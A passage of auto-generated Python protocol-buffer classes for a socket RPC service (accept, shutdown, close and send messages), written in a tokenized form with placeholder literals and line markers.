<NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . DOUBLE , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class AcceptReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_new_socket_descriptor_ = <NUM_LIT:0> <EOL> new_socket_descriptor_ = "<STR_LIT>" <EOL> has_remote_address_ = <NUM_LIT:0> <EOL> remote_address_ = None <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def new_socket_descriptor ( self ) : return self . new_socket_descriptor_ <EOL> def set_new_socket_descriptor ( self , x ) : <EOL> self . has_new_socket_descriptor_ = <NUM_LIT:1> <EOL> self . new_socket_descriptor_ = x <EOL> def clear_new_socket_descriptor ( self ) : <EOL> if self . has_new_socket_descriptor_ : <EOL> self . has_new_socket_descriptor_ = <NUM_LIT:0> <EOL> self . new_socket_descriptor_ = "<STR_LIT>" <EOL> def has_new_socket_descriptor ( self ) : return self . has_new_socket_descriptor_ <EOL> def remote_address ( self ) : <EOL> if self . remote_address_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . remote_address_ is None : self . remote_address_ = AddressPort ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . remote_address_ <EOL> def mutable_remote_address ( self ) : self . has_remote_address_ = <NUM_LIT:1> ; return self . remote_address ( ) <EOL> def clear_remote_address ( self ) : <EOL> if self . has_remote_address_ : <EOL> self . has_remote_address_ = <NUM_LIT:0> ; <EOL> if self . remote_address_ is not None : self . remote_address_ . Clear ( ) <EOL> def has_remote_address ( self ) : return self . has_remote_address_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_new_socket_descriptor ( ) ) : self . set_new_socket_descriptor ( x . new_socket_descriptor ( ) ) <EOL> if ( x . has_remote_address ( ) ) : self . mutable_remote_address ( ) . MergeFrom ( x . remote_address ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_new_socket_descriptor_ != x . has_new_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_new_socket_descriptor_ and self . new_socket_descriptor_ != x . new_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_remote_address_ != x . has_remote_address_ : return <NUM_LIT:0> <EOL> if self . has_remote_address_ and self . remote_address_ != x . remote_address_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( self . has_remote_address_ and not self . remote_address_ . IsInitialized ( debug_strs ) ) : initialized = <NUM_LIT:0> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_new_socket_descriptor_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . new_socket_descriptor_ ) ) <EOL> if ( self . has_remote_address_ ) : n += <NUM_LIT:1> + self . lengthString ( self . remote_address_ . ByteSize ( ) ) <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_new_socket_descriptor_ ) : n += <NUM_LIT:1> + self . lengthString ( len ( self . new_socket_descriptor_ ) ) <EOL> if ( self . has_remote_address_ ) : n += <NUM_LIT:1> + self . lengthString ( self . remote_address_ . ByteSizePartial ( ) ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_new_socket_descriptor ( ) <EOL> self . clear_remote_address ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> if ( self . has_new_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . new_socket_descriptor_ ) <EOL> if ( self . has_remote_address_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . remote_address_ . ByteSize ( ) ) <EOL> self . remote_address_ . OutputUnchecked ( out ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_new_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putPrefixedString ( self . new_socket_descriptor_ ) <EOL> if ( self . has_remote_address_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt32 ( self . remote_address_ . ByteSizePartial ( ) ) <EOL> self . remote_address_ . OutputPartial ( out ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT> : <EOL> self . set_new_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> length = d . getVarInt32 ( ) <EOL> tmp = ProtocolBuffer . Decoder ( d . buffer ( ) , d . pos ( ) , d . pos ( ) + length ) <EOL> d . skip ( length ) <EOL> self . mutable_remote_address ( ) . TryMerge ( tmp ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_new_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . new_socket_descriptor_ ) ) <EOL> if self . has_remote_address_ : <EOL> res += prefix + "<STR_LIT>" <EOL> res += self . remote_address_ . __str__ ( prefix + "<STR_LIT:U+0020>" , printElemNumber ) <EOL> res += prefix + "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> knew_socket_descriptor = <NUM_LIT:2> <EOL> kremote_address = <NUM_LIT:3> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } , <NUM_LIT:3> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . STRING , <EOL> } , <NUM_LIT:3> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class ShutDownRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> SOCKET_SHUT_RD = <NUM_LIT:1> <EOL> SOCKET_SHUT_WR = <NUM_LIT:2> <EOL> SOCKET_SHUT_RDWR = <NUM_LIT:3> <EOL> _How_NAMES = { <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } <EOL> def How_Name ( cls , x ) : return cls . _How_NAMES . get ( x , "<STR_LIT>" ) <EOL> How_Name = classmethod ( How_Name ) <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> has_how_ = <NUM_LIT:0> <EOL> how_ = <NUM_LIT:0> <EOL> has_send_offset_ = <NUM_LIT:0> <EOL> send_offset_ = <NUM_LIT:0> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def how ( self ) : return self . how_ <EOL> def set_how ( self , x ) : <EOL> self . has_how_ = <NUM_LIT:1> <EOL> self . how_ = x <EOL> def clear_how ( self ) : <EOL> if self . has_how_ : <EOL> self . has_how_ = <NUM_LIT:0> <EOL> self . how_ = <NUM_LIT:0> <EOL> def has_how ( self ) : return self . has_how_ <EOL> def send_offset ( self ) : return self . send_offset_ <EOL> def set_send_offset ( self , x ) : <EOL> self . has_send_offset_ = <NUM_LIT:1> <EOL> self . send_offset_ = x <EOL> def clear_send_offset ( self ) : <EOL> if self . has_send_offset_ : <EOL> self . has_send_offset_ = <NUM_LIT:0> <EOL> self . send_offset_ = <NUM_LIT:0> <EOL> def has_send_offset ( self ) : return self . has_send_offset_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> if ( x . has_how ( ) ) : self . set_how ( x . how ( ) ) <EOL> if ( x . has_send_offset ( ) ) : self . set_send_offset ( x . send_offset ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_how_ != x . has_how_ : return <NUM_LIT:0> <EOL> if self . has_how_ and self . how_ != x . how_ : return <NUM_LIT:0> <EOL> if self . has_send_offset_ != x . has_send_offset_ : return <NUM_LIT:0> <EOL> if self . has_send_offset_ and self . send_offset_ != x . send_offset_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_how_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> if ( not self . has_send_offset_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> n += self . lengthVarInt64 ( self . how_ ) <EOL> n += self . lengthVarInt64 ( self . send_offset_ ) <EOL> return n + <NUM_LIT:3> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_how_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . how_ ) <EOL> if ( self . has_send_offset_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthVarInt64 ( self . send_offset_ ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> self . clear_how ( ) <EOL> self . clear_send_offset ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . how_ ) <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt64 ( self . send_offset_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_how_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt32 ( self . how_ ) <EOL> if ( self . has_send_offset_ ) : <EOL> out . putVarInt32 ( <NUM_LIT> ) <EOL> out . putVarInt64 ( self . send_offset_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_how ( d . getVarInt32 ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT> : <EOL> self . set_send_offset ( d . getVarInt64 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> if self . has_how_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt32 ( self . how_ ) ) <EOL> if self . has_send_offset_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . send_offset_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> khow = <NUM_LIT:2> <EOL> ksend_offset = <NUM_LIT:3> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> <NUM_LIT:3> : "<STR_LIT>" , <EOL> } , <NUM_LIT:3> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:3> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:3> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class ShutDownReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> def __init__ ( self , contents = None ) : <EOL> pass <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def Clear ( self ) : <EOL> pass <EOL> def OutputUnchecked ( self , out ) : <EOL> pass <EOL> def OutputPartial ( self , out ) : <EOL> pass <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> } , <NUM_LIT:0> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:0> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class CloseRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> has_send_offset_ = <NUM_LIT:0> <EOL> send_offset_ = - <NUM_LIT:1> <EOL> def __init__ ( self , contents = None ) : <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def send_offset ( self ) : return self . send_offset_ <EOL> def set_send_offset ( self , x ) : <EOL> self . has_send_offset_ = <NUM_LIT:1> <EOL> self . send_offset_ = x <EOL> def clear_send_offset ( self ) : <EOL> if self . has_send_offset_ : <EOL> self . has_send_offset_ = <NUM_LIT:0> <EOL> self . send_offset_ = - <NUM_LIT:1> <EOL> def has_send_offset ( self ) : return self . has_send_offset_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> if ( x . has_send_offset ( ) ) : self . set_send_offset ( x . send_offset ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_send_offset_ != x . has_send_offset_ : return <NUM_LIT:0> <EOL> if self . has_send_offset_ and self . send_offset_ != x . send_offset_ : return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> if ( not self . has_socket_descriptor_ ) : <EOL> initialized = <NUM_LIT:0> <EOL> if debug_strs is not None : <EOL> debug_strs . append ( '<STR_LIT>' ) <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_send_offset_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . send_offset_ ) <EOL> return n + <NUM_LIT:1> <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> if ( self . has_socket_descriptor_ ) : <EOL> n += <NUM_LIT:1> <EOL> n += self . lengthString ( len ( self . socket_descriptor_ ) ) <EOL> if ( self . has_send_offset_ ) : n += <NUM_LIT:1> + self . lengthVarInt64 ( self . send_offset_ ) <EOL> return n <EOL> def Clear ( self ) : <EOL> self . clear_socket_descriptor ( ) <EOL> self . clear_send_offset ( ) <EOL> def OutputUnchecked ( self , out ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_send_offset_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt64 ( self . send_offset_ ) <EOL> def OutputPartial ( self , out ) : <EOL> if ( self . has_socket_descriptor_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:10> ) <EOL> out . putPrefixedString ( self . socket_descriptor_ ) <EOL> if ( self . has_send_offset_ ) : <EOL> out . putVarInt32 ( <NUM_LIT:16> ) <EOL> out . putVarInt64 ( self . send_offset_ ) <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if tt == <NUM_LIT:10> : <EOL> self . set_socket_descriptor ( d . getPrefixedString ( ) ) <EOL> continue <EOL> if tt == <NUM_LIT:16> : <EOL> self . set_send_offset ( d . getVarInt64 ( ) ) <EOL> continue <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> if self . has_socket_descriptor_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatString ( self . socket_descriptor_ ) ) <EOL> if self . has_send_offset_ : res += prefix + ( "<STR_LIT>" % self . DebugFormatInt64 ( self . send_offset_ ) ) <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> ksocket_descriptor = <NUM_LIT:1> <EOL> ksend_offset = <NUM_LIT:2> <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> <NUM_LIT:1> : "<STR_LIT>" , <EOL> <NUM_LIT:2> : "<STR_LIT>" , <EOL> } , <NUM_LIT:2> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> <NUM_LIT:1> : ProtocolBuffer . Encoder . STRING , <EOL> <NUM_LIT:2> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:2> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class CloseReply ( ProtocolBuffer . ProtocolMessage ) : <EOL> def __init__ ( self , contents = None ) : <EOL> pass <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> return <NUM_LIT:1> <EOL> def IsInitialized ( self , debug_strs = None ) : <EOL> initialized = <NUM_LIT:1> <EOL> return initialized <EOL> def ByteSize ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def ByteSizePartial ( self ) : <EOL> n = <NUM_LIT:0> <EOL> return n <EOL> def Clear ( self ) : <EOL> pass <EOL> def OutputUnchecked ( self , out ) : <EOL> pass <EOL> def OutputPartial ( self , out ) : <EOL> pass <EOL> def TryMerge ( self , d ) : <EOL> while d . avail ( ) > <NUM_LIT:0> : <EOL> tt = d . getVarInt32 ( ) <EOL> if ( tt == <NUM_LIT:0> ) : raise ProtocolBuffer . ProtocolBufferDecodeError <EOL> d . skipData ( tt ) <EOL> def __str__ ( self , prefix = "<STR_LIT>" , printElemNumber = <NUM_LIT:0> ) : <EOL> res = "<STR_LIT>" <EOL> return res <EOL> def _BuildTagLookupTable ( sparse , maxtag , default = None ) : <EOL> return tuple ( [ sparse . get ( i , default ) for i in xrange ( <NUM_LIT:0> , <NUM_LIT:1> + maxtag ) ] ) <EOL> _TEXT = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : "<STR_LIT>" , <EOL> } , <NUM_LIT:0> ) <EOL> _TYPES = _BuildTagLookupTable ( { <EOL> <NUM_LIT:0> : ProtocolBuffer . Encoder . NUMERIC , <EOL> } , <NUM_LIT:0> , ProtocolBuffer . Encoder . MAX_TYPE ) <EOL> _STYLE = """<STR_LIT>""" <EOL> _STYLE_CONTENT_TYPE = """<STR_LIT>""" <EOL> _PROTO_DESCRIPTOR_NAME = '<STR_LIT>' <EOL> class SendRequest ( ProtocolBuffer . ProtocolMessage ) : <EOL> has_socket_descriptor_ = <NUM_LIT:0> <EOL> socket_descriptor_ = "<STR_LIT>" <EOL> has_data_ = <NUM_LIT:0> <EOL> data_ = "<STR_LIT>" <EOL> has_stream_offset_ = <NUM_LIT:0> <EOL> stream_offset_ = <NUM_LIT:0> <EOL> has_flags_ = <NUM_LIT:0> <EOL> flags_ = <NUM_LIT:0> <EOL> has_send_to_ = <NUM_LIT:0> <EOL> send_to_ = None <EOL> has_timeout_seconds_ = <NUM_LIT:0> <EOL> timeout_seconds_ = - <NUM_LIT:1.0> <EOL> def __init__ ( self , contents = None ) : <EOL> self . lazy_init_lock_ = thread . allocate_lock ( ) <EOL> if contents is not None : self . MergeFromString ( contents ) <EOL> def socket_descriptor ( self ) : return self . socket_descriptor_ <EOL> def set_socket_descriptor ( self , x ) : <EOL> self . has_socket_descriptor_ = <NUM_LIT:1> <EOL> self . socket_descriptor_ = x <EOL> def clear_socket_descriptor ( self ) : <EOL> if self . has_socket_descriptor_ : <EOL> self . has_socket_descriptor_ = <NUM_LIT:0> <EOL> self . socket_descriptor_ = "<STR_LIT>" <EOL> def has_socket_descriptor ( self ) : return self . has_socket_descriptor_ <EOL> def data ( self ) : return self . data_ <EOL> def set_data ( self , x ) : <EOL> self . has_data_ = <NUM_LIT:1> <EOL> self . data_ = x <EOL> def clear_data ( self ) : <EOL> if self . has_data_ : <EOL> self . has_data_ = <NUM_LIT:0> <EOL> self . data_ = "<STR_LIT>" <EOL> def has_data ( self ) : return self . has_data_ <EOL> def stream_offset ( self ) : return self . stream_offset_ <EOL> def set_stream_offset ( self , x ) : <EOL> self . has_stream_offset_ = <NUM_LIT:1> <EOL> self . stream_offset_ = x <EOL> def clear_stream_offset ( self ) : <EOL> if self . has_stream_offset_ : <EOL> self . has_stream_offset_ = <NUM_LIT:0> <EOL> self . stream_offset_ = <NUM_LIT:0> <EOL> def has_stream_offset ( self ) : return self . has_stream_offset_ <EOL> def flags ( self ) : return self . flags_ <EOL> def set_flags ( self , x ) : <EOL> self . has_flags_ = <NUM_LIT:1> <EOL> self . flags_ = x <EOL> def clear_flags ( self ) : <EOL> if self . has_flags_ : <EOL> self . has_flags_ = <NUM_LIT:0> <EOL> self . flags_ = <NUM_LIT:0> <EOL> def has_flags ( self ) : return self . has_flags_ <EOL> def send_to ( self ) : <EOL> if self . send_to_ is None : <EOL> self . lazy_init_lock_ . acquire ( ) <EOL> try : <EOL> if self . send_to_ is None : self . send_to_ = AddressPort ( ) <EOL> finally : <EOL> self . lazy_init_lock_ . release ( ) <EOL> return self . send_to_ <EOL> def mutable_send_to ( self ) : self . has_send_to_ = <NUM_LIT:1> ; return self . send_to ( ) <EOL> def clear_send_to ( self ) : <EOL> if self . has_send_to_ : <EOL> self . has_send_to_ = <NUM_LIT:0> ; <EOL> if self . send_to_ is not None : self . send_to_ . Clear ( ) <EOL> def has_send_to ( self ) : return self . has_send_to_ <EOL> def timeout_seconds ( self ) : return self . timeout_seconds_ <EOL> def set_timeout_seconds ( self , x ) : <EOL> self . has_timeout_seconds_ = <NUM_LIT:1> <EOL> self . timeout_seconds_ = x <EOL> def clear_timeout_seconds ( self ) : <EOL> if self . has_timeout_seconds_ : <EOL> self . has_timeout_seconds_ = <NUM_LIT:0> <EOL> self . timeout_seconds_ = - <NUM_LIT:1.0> <EOL> def has_timeout_seconds ( self ) : return self . has_timeout_seconds_ <EOL> def MergeFrom ( self , x ) : <EOL> assert x is not self <EOL> if ( x . has_socket_descriptor ( ) ) : self . set_socket_descriptor ( x . socket_descriptor ( ) ) <EOL> if ( x . has_data ( ) ) : self . set_data ( x . data ( ) ) <EOL> if ( x . has_stream_offset ( ) ) : self . set_stream_offset ( x . stream_offset ( ) ) <EOL> if ( x . has_flags ( ) ) : self . set_flags ( x . flags ( ) ) <EOL> if ( x . has_send_to ( ) ) : self . mutable_send_to ( ) . MergeFrom ( x . send_to ( ) ) <EOL> if ( x . has_timeout_seconds ( ) ) : self . set_timeout_seconds ( x . timeout_seconds ( ) ) <EOL> def Equals ( self , x ) : <EOL> if x is self : return <NUM_LIT:1> <EOL> if self . has_socket_descriptor_ != x . has_socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_socket_descriptor_ and self . socket_descriptor_ != x . socket_descriptor_ : return <NUM_LIT:0> <EOL> if self . has_data_ != x . has_data_ : return <NUM_LIT:0> <EOL> if self . has_data_ and self . data_ != x . data_ : return <NUM_LIT:0> <EOL> if self . has_stream_offset_ != x . has_stream_offset_ : return <NUM_LIT:0> <EOL> if self . has_stream_offset_ and self . stream_offset_ != x . stream_offset_ : return <NUM_LIT:0> <EOL> if self . has_flags_ != x . has_flags_ : return <NUM_LIT:0> <EOL> if self . has_flags_ and self . flags_ != x . flags_ : return <NUM_LIT:0> <EOL> if self . has_send_to_ != x . has_send_to_ : return <NUM_LIT:0> <EOL> if self . has_send_to_ and self . send_to_ != x . send_to_ : return <NUM_LIT:0> <EOL> if self . has_timeout_seconds_ != x . has_timeout_seconds_ : return <NUM_LIT:0> <EOL> if self . 